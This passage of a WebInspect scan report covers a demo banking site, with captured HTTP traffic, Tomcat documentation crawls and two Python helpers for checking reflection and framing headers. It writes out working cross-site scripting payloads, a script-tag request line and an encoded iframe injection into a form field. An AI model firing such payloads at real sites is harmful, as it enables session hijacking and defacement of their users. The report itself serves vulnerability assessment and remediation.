Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Audit.Attack"; SID="E9A0C85302073DA2F971AC2732F2201A";
PSID="B575CF6508C02A80B46DA672DF270F32"; SessionType="AuditAttack"; CrawlType="None"; AttackType="None";
OriginatingEngineID="65cee7d3-561f-40dc-b5eb-c0b8c2383fcb"; AttackSequence="16"; AttackParamDesc="";
AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="10365"; Engine="Request+Modify";
SmartMode="NonServerSpecificOnly"; ThreadId="94"; ThreadType="AuditorStateRequestorPool";
X-RequestManager-Memo: sid="43"; smi="0"; sc="1"; ID="6d629b1a-f9c1-4935-a806-1729e5cb959f";
X-Request-Memo: ID="60a641cb-d625-4f41-a37e-c6775261712e"; sc="1"; ThreadId="103";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798

Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:54:31 GMT
Server: ...TRUNCATED...

Insecure Deployment: Unpatched Application


Page:

description

http://zero.webappsecurity.com:80/

Request:
<script>alert(097531)</script> / HTTP/1.1
Content-Length:0
Content-Length:0
Content-Length:0
Host: zero.webappsecurity.com
Response:
HTTP/1.1 413 Request Entity Too Large
Date: Mon, 10 Oct 2016 08:09:38 GMT
Access-Control-Allow-Origin: *
Access-Control-Allow-Origin: *
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 912
...TRUNCATED...rce<br />/<br />
does not allow request data with <script>alert(097531)</script> requests, or the amount of data provided in
the r...TRUNCATED...
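Both the reflected XSS on /forgotten-password-send.html and the 413 error page above reflect request data verbatim: the forgotten-password page echoes the `email` field, and the error page echoes the request method. The helper below is an added example, not from the report or the application: it decodes the scanner's double-URL-encoded `AttackString` (the `X-Scan-Memo` value is encoded once more than the POST body), parses the body the way the servlet container does, tests a response for the unencoded payload, and shows the HTML-escaped output a fixed page would emit. The response fragments are constructed around the report's truncated excerpts; `PAYLOAD` and the function names are the example's own. The mixed-case `iFrAmE` tag is the scanner's way of getting past case-sensitive blacklists, which is why the correct fix is encoding on output rather than filtering tag names. The 413 response appears to come from a front-end Apache httpd rather than from Tomcat (iso-8859-1 error page, no Apache-Coyote `Server` header), so that fix lives on the proxy layer, not in the application.

```python
"""Reflection check for the XSS and 413 error-page findings.

Added example; not part of the WebInspect report. Captured values are copied
from the report; the response fragments are constructed around its excerpts.
"""
import html
from urllib.parse import parse_qs, unquote

# X-Scan-Memo AttackString, joined across the wrapped header lines.
ATTACK_STRING = (
    "John.Doe%2540somewhere.com%253c%2569%2546%2572%2541%256d%2545%2520%2573%2552%2563"
    "%253d%2578%2553%2572%2546%2574%2545%2573%2554%252e%2573%2550%2569%253e%253c%252f"
    "%2569%2546%2572%2541%256d%2545%253e"
)
# The POST body the scanner actually sent (Content-Length: 155).
POST_BODY = (
    "email=John.Doe%40somewhere.com%3c%69%46%72%41%6d%45%20%73%52%63%3d%78%53%72%46%74%45%73%"
    "54%2e%73%50%69%3e%3c%2f%69%46%72%41%6d%45%3e&submit=Send%20Password"
)
PAYLOAD = "<iFrAmE sRc=xSrFtEsT.sPi></iFrAmE>"
# Constructed around the truncated response excerpts.
XSS_RESPONSE = "...ent to the following email: John.Doe@somewhere.com<iFrAmE sRc=xSrFtEsT.sPi></iFrAmE>\n</div>"
ERROR_413_RESPONSE = ("... does not allow request data with <script>alert(097531)</script> requests, "
                      "or the amount of data provided in the r...")


def sent_value(attack_string):
    """X-Scan-Memo stores the attack URL-encoded one level more than the body:
    one unquote yields the body form, two yield what the server decoded."""
    return unquote(unquote(attack_string))


def form_fields(body):
    """Decode an application/x-www-form-urlencoded body as the container does."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def reflected_unencoded(body, payload):
    """True when the payload is present verbatim, i.e. no output encoding was
    applied. The encoded form (&lt;iFrAmE ...) is the safe outcome."""
    return payload in body


def safe_render(prefix, value):
    """What the page should emit: escape untrusted text before placing it in
    HTML. quote=True also neutralises the value inside attribute contexts."""
    return prefix + html.escape(value, quote=True)


if __name__ == "__main__":
    print("server saw:", sent_value(ATTACK_STRING))
    print("fields:", form_fields(POST_BODY))
    print("xss reflected:", reflected_unencoded(XSS_RESPONSE, PAYLOAD))
    print("413 reflected:", reflected_unencoded(ERROR_413_RESPONSE, "<script>alert(097531)</script>"))
    print("fixed:", safe_render("...ent to the following email: ", form_fields(POST_BODY)["email"]))
```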

Cross-Frame Scripting
Page:

description

http://zero.webappsecurity.com:80/

Request:
GET / HTTP/1.1
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="306E42D0F653E7CFA6720D7F15AE506B"; SessionType="ExternalAddedToCrawl";
CrawlType="None"; AttackType="None"; OriginatingEngineID="00000000-0000-0000-0000-000000000000"; ThreadId="86";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="24b6c858-ec1a-49e2-a09a-7d7c72242eb4";
X-Request-Memo: ID="a84d2393-837c-4185-b786-183812f9e186"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:50:21 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 12456

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Zero - Personal Banking - Loans - Credit Cards</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<link type="text/css" rel="stylesheet" href="/resources/css/bootstrap.min.css"/>


<link type="text/css" rel="stylesheet" href="/resources/css/font-awesome.css"/>
<link type="text/css" rel="stylesheet" href="/resources/css/main.css"/>
<script src="/resources/js/jquery-1.8.2.min.js"></script>
<script src="/resources/js/bootstrap.min.js"></script>
<script src="/resources/js/placeholders.min.js"></script>
<script type="text/javascript">
Placeholders.init({
live: true, // Apply to future and modified elements too
hideOnFocus: true // Hide the placeholder when the element receives focus
});
</script>
<script type="text/javascript">
$(document).ajaxError(function errorHandler(event, xhr, ajaxOptions, thrownError) {
if (xhr.status == 403) {
window.location.reload();
}
});
</script>
</head>
<body>
<div class="wrapper">
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container">
<a href="/index.html" class="brand">Zero Bank</a>
<div>
<ul class="nav float-right">
<li> <form action="/search.html"
class="navbar-search pull-right" style="padding-right: 20px">
<input type="text" id="searchTerm" name="searchTerm" class="search-query" placeholder="Search"/>
</form>
</li>
<li>
<button id="signin_button" type="button" class="signin btn btn-info">
<i class="icon-signin"></i>Signin
</button>
</li>
</ul>
</div>
</div>
</div>
</div>
<script type="text/javascript">
$(function() {
var path = "/";
$("#signin_button").click(function(event) {
event.preventDefault();
window.location.href = path + "login" + ".html";
});
});
</script>
<div class="container">
<div class="top_offset">
<div class="row">
<div class="span12">
<div id="nav" class="clearfix">
<ul id="pages-nav">
<li id="homeMenu"><div><strong>Home</strong></div></li>
<li id="onlineBankingMenu"><div><strong>Online Banking</strong></div></li>
<li id="feedback"><div><strong>Feedback</strong></div></li>
</ul>
</div>
</div>
<script type="text/javascript">
$(function () {
var path = "/";
var featureIdToName = {
"index": "homeMenu",
"online-banking": "onlineBankingMenu",
"feedback": "feedback"
};
if (document.location.href.match(".*" + path + "$") != null) {
$("#homeMenu").addClass("active");
} else {
$.each(featureIdToName, function(featureId, featureName) {
if (document.location.href.indexOf(featureId + ".html") >= 0) {
$("#" + featureName).addClass("active");
}
});
}
$.each(featureIdToName, function(featureId, featu
...TRUNCATED...
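WebInspect reports Cross-Frame Scripting when a page is served without any framing restriction; the `/` response above carries neither `X-Frame-Options` nor a `Content-Security-Policy` with `frame-ancestors`. The check below is an added example, not from the report: it parses a raw response head, decides whether any origin may frame the page (CSP `frame-ancestors` takes precedence over `X-Frame-Options` in browsers that support it, so it is evaluated first) and flags two other things visible in the captured headers. `CAPTURED_HEAD` is copied from the report; `HARDENED_HEAD` is an assumed corrected equivalent, not a capture.

```python
"""Framing and header audit for a captured HTTP response head.

Added example; not part of the WebInspect report. CAPTURED_HEAD is the
report's own response head for GET /; HARDENED_HEAD is assumed.
"""
from collections import defaultdict

CAPTURED_HEAD = """HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:50:21 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Cache-Control: no-cache, max-age=0, must-revalidate, no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 12456
"""

HARDENED_HEAD = """HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'
X-Content-Type-Options: nosniff
"""


def parse_headers(raw):
    """Map lower-cased header names to their list of values (headers repeat)."""
    headers = defaultdict(list)
    for line in raw.splitlines()[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()].append(value.strip())
    return headers


def csp_frame_ancestors(headers):
    """Source list of the CSP frame-ancestors directive, or None if absent."""
    for policy in headers.get("content-security-policy", []):
        for directive in policy.split(";"):
            parts = directive.split()
            if parts and parts[0].lower() == "frame-ancestors":
                return parts[1:]
    return None


def framing_allowed(headers):
    """True when any origin may frame the page."""
    ancestors = csp_frame_ancestors(headers)
    if ancestors is not None:
        return "*" in ancestors  # 'none', 'self' or explicit hosts all restrict framing
    xfo = [v.upper() for v in headers.get("x-frame-options", [])]
    return not any(v in ("DENY", "SAMEORIGIN") or v.startswith("ALLOW-FROM") for v in xfo)


def audit(raw):
    """Return the findings a reviewer would raise on this response head."""
    headers = parse_headers(raw)
    findings = []
    if framing_allowed(headers):
        findings.append("Cross-Frame Scripting: no X-Frame-Options / CSP frame-ancestors")
    if "*" in headers.get("access-control-allow-origin", []):
        findings.append("CORS: Access-Control-Allow-Origin: * on an HTML page")
    if "nosniff" not in [v.lower() for v in headers.get("x-content-type-options", [])]:
        findings.append("Missing X-Content-Type-Options: nosniff")
    return findings


if __name__ == "__main__":
    for finding in audit(CAPTURED_HEAD):
        print(finding)
```

`Access-Control-Allow-Origin: *` is sent on every response in this report, the login page included. The wildcard cannot be combined with credentials, so it does not let another origin read cookie-authenticated pages, but it lets any site read every unauthenticated response and serves no purpose on an HTML page; it belongs only on the API paths, and for the origins, that actually need it.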

Low Issues
Poor Error Handling: Unhandled Exception
Page:

description

http://zero.webappsecurity.com:80/docs/virtual-hosting-howto.html

Request:
GET /docs/virtual-hosting-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="3789B0DC3DE1119CE46D7BC7A2B69DBC";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="bd1a6393-365a-479d-966d-22e24f2f6476";
X-Request-Memo: ID="8e38588a-e473-42d5-b44f-cc6bfd7eea96"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:30 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"15437-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 15437
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
...TRUNCATED.../images/asf-logo.gif" align="right" alt="Apache Logo" border="0"></a></td></tr></table><table border="0"
width="100%"...TRUNCATED...GI</a></li><li><a href="proxy-howto.html">15) Proxy Support</a></li><li><a href="mbeans-descriptor-howto.html"...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/security-howto.html

Request:
GET /docs/security-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="1F194499C7D4146D9EC2FB6CA4EFA71D";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="962ff1a4-3801-4c80-89fc-8212643d4c18";
X-Request-Memo: ID="b52d7f9d-48f3-4710-be89-310ea147fa02"; sc="1"; ThreadId="100";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:34 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"41066-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 41066
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
...TRUNCATED...g
multiple untrusted web applications, it is recommended that each web
application is deployed to a separa...TRUNCATED...tens on for connections. By default, the
connector listens on all configured IP addresses.</p>
<p>Th...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/class-loader-howto.html

Request:
GET /docs/class-loader-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="3F9DBBAE2124F08F05A08341DB70E15C";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="053e3966-f932-4d26-b649-7c3256fb9f9e";
X-Request-Memo: ID="5c28cf4c-7c3c-44cf-982e-9ebadffdae81"; sc="1"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:14 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"21196-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 21196
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
...TRUNCATED.../a></li><li><a href="monitoring.html">21) Monitoring and Management</a></li><li><a
href="logging.html">22) Logging</...TRUNCATED...ual Hosting</a></li><li><a href="aio.html">25) Advanced IO</a></li><
li><a href="extras.html">26) Additional Components...TRUNCATED...zed</a></li><li><a href="security-howto.html">28)
Security Considerations</a></li><li><a href="windows-service-howto.html">29) Windows
Service</a></l...TRUNCATED...uration</a></li><li><a href="api/index.html">Tomcat Javadocs</a></li><li><a
href="servletapi/index.html">Servlet...TRUNCATED...

Page:

http://zero.webappsecurity.com:80/docs/realm-howto.html

Request:
GET /docs/realm-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="1ECABF8131D9FB74C4F25E6F3BB95533";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="1a2ace84-1955-4345-a9e8-fadc02fda9ec";
X-Request-Memo: ID="642ab42b-ae55-4a13-8cf5-90b8052483f9"; sc="1"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:14 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"67464-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 67464
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
...TRUNCATED...der="0" cellspacing="0" cellpadding="2"><tr><td bgcolor="#525D76"><font color="#ffffff"
face="arial,helvetica.sa...TRUNCATED...ix-like operating
systems, because access to specific web application resources is granted to
all users posses...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/manager-howto.html

Request:
GET /docs/manager-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/manager/html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="112FD5EEB1B0EC04177727EFB7E63F42";
PSID="5691FBE4D5310DEC25DD5EB591F3E328"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="Relative";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="280";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="ed87c790-51f7-4bb6-9c73-d612e6966286";
X-Request-Memo: ID="fd6d5ffc-7fab-4458-b31d-4099a01505a6"; sc="1"; ThreadId="96";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:51:28 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"81539-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 81539
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
...TRUNCATED...><tr><td bgcolor="#828DA6"><font color="#ffffff" face="arial,helvetica.sanserif"><a name="List Available
Global JNDI "><!--()--></a><a name="List_Available_Global_JNDI_Resources"><strong>List Available Global JNDI
Resources</stron...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/setup.html

Request:
GET /docs/setup.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="78FB38A8ACEF0C9A4046CDBADE8ACEE3";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="91b98c3c-237d-473b-8586-34c28e1bfeba";
X-Request-Memo: ID="c2970dac-7f3e-47e3-a790-2df24e913f0a"; sc="1"; ThreadId="100";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:13 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"15892-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 15892
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
...TRUNCATED...<li><a href="jspapi/index.html">JSP 2.2 Javadocs</a></li><li><a href="elapi/index.html">EL 2.2 Javadocs</a></li><li><a href="websocketapi/index.html">WebSocket 1.1 Javadocs</a></li>...TRUNCATED...li><a
href="#Windows">Windows</a></li><li><a href="#Unix_daemon">Unix daemon</a></li></ul>
</blockquote></td></tr></table><table border="0" cellspacing="0" cellpadding="2"><tr><td
bgcolor="#525D76"><font...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/security-manager-howto.html

Request:
GET /docs/security-manager-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="7E424F7BB5A58C5B289CFF0AA76BF8D9";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="c787cd9b-10e4-436b-994a-29b9197c970a";
X-Request-Memo: ID="28cbc89a-d72e-43ae-a354-dae1fb465bc8"; sc="1"; ThreadId="99";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:14 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"34024-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 34024
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
...TRUNCATED..."http://docs.oracle.com/javase/7/docs/technotes/guides/security/">
http://docs.oracle.com/javase/7/docs/tec...TRUNCATED...ess to JVM properties such as <code>java.home</code>.</li>
<li><strong>java.lang.RuntimePermission</strong> - Controls use of
some System/Runtime functions like ...TRUNCATED...ing "*" can be
used to do wild card matching for a JNDI named file resource when
granting permission. For e...TRUNCATED...va.io.FilePermission "${catalina.base}${file.separator}
// webapps${file.separator}examples${file.separato...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/ssl-howto.html

Request:
GET /docs/ssl-howto.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="6C5A14E2FD330A1E50DE39A279EC7702";
PSID="F123B9A3291354F97AC6F79540B0A325"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="8b14e1f3-1e24-45b1-a860-eef9e3b561bc";
X-Request-Memo: ID="1808214a-2501-47fe-bb85-9c1c9edf6156"; sc="1"; ThreadId="98";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:52:14 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"39773-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 39773
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
...TRUNCATED...3) First webapp</a></li><li><a href="deployer-howto.html">4) Deployer</a></li><li><a href="manager-howto.html">5...TRUNCATED...cessing.
This is a two-way process, meaning that both the server AND the browser encrypt
all traffic before se...TRUNCATED...-to-business (B2B) transactions than with individual
users. Most SSL-enabled web servers do not request Client...TRUNCATED...ding="2"><tr><td bgcolor="#828DA6"><font
color="#ffffff" face="arial,helvetica.sanserif"><a name="Prepare the Certificate Keystore"><!--()--></a><a
name="Prepare_the_Certifica...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/config/listeners.html

Request:
GET /docs/config/listeners.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/jndi-datasource-examples-howto.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="696E82F0D0DB9E2D37764BFE766D74AE";
PSID="4005A3D0BF6D3E8BFED6DB64AB0C2F8D"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="b2a89a24-3bdf-406a-8fb4-51431fde34cb";
X-Request-Memo: ID="455c0f28-12af-4d34-b488-f28ad4437f21"; sc="2"; ThreadId="97";
Cookie: CustomCookie=WebInspect118192ZXBCBF207B310B41649F99E1C6602870C9Y9798;JSESSIONID=238461F5
Response:
HTTP/1.1 200 OK
Date: Mon, 10 Oct 2016 07:53:24 GMT
Server: Apache-Coyote/1.1
Access-Control-Allow-Origin: *
Accept-Ranges: bytes
ETag: W/"42468-1466008846000"
Last-Modified: Wed, 15 Jun 2016 16:40:46 GMT
Content-Type: text/html
Content-Length: 42468
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
...TRUNCATED...>
<p>Entropy source used to seed the SSLEngine's PRNG. The default value
is <code>builtin</code>. ...TRUNCATED...
Page:

http://zero.webappsecurity.com:80/docs/config/context.html

Request:
GET /docs/config/context.html HTTP/1.1
Referer: http://zero.webappsecurity.com/docs/manager-howto.html
Accept: */*
Pragma: no-cache
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0
Host: zero.webappsecurity.com
Connection: Keep-Alive
X-WIPP: AscVersion=16.10.463.10
X-Scan-Memo: Category="Crawl"; SID="4C8E34E8231AA22138A4F8CA57DA7F61";
PSID="112FD5EEB1B0EC04177727EFB7E63F42"; SessionType="Crawl"; CrawlType="HTML"; AttackType="None";
OriginatingEngineID="00000000-0000-0000-0000-000000000000"; AttributeName="href"; Format="NonRooted";
LinkKind="HyperLink"; Locations="HtmlNode"; Source="ScriptExecution"; ThreadId="278";
ThreadType="CrawlBreadthFirstDBReader";
X-RequestManager-Memo: sid="35"; smi="0"; sc="1"; ID="cfb07bb6-870f-4813-8e5b-89dcc70b8b36";
X-Request-Memo: ID="bc0b0aa9-c3d8-46be-ba39-799ba3075213"; sc="2"; ThreadId="99";
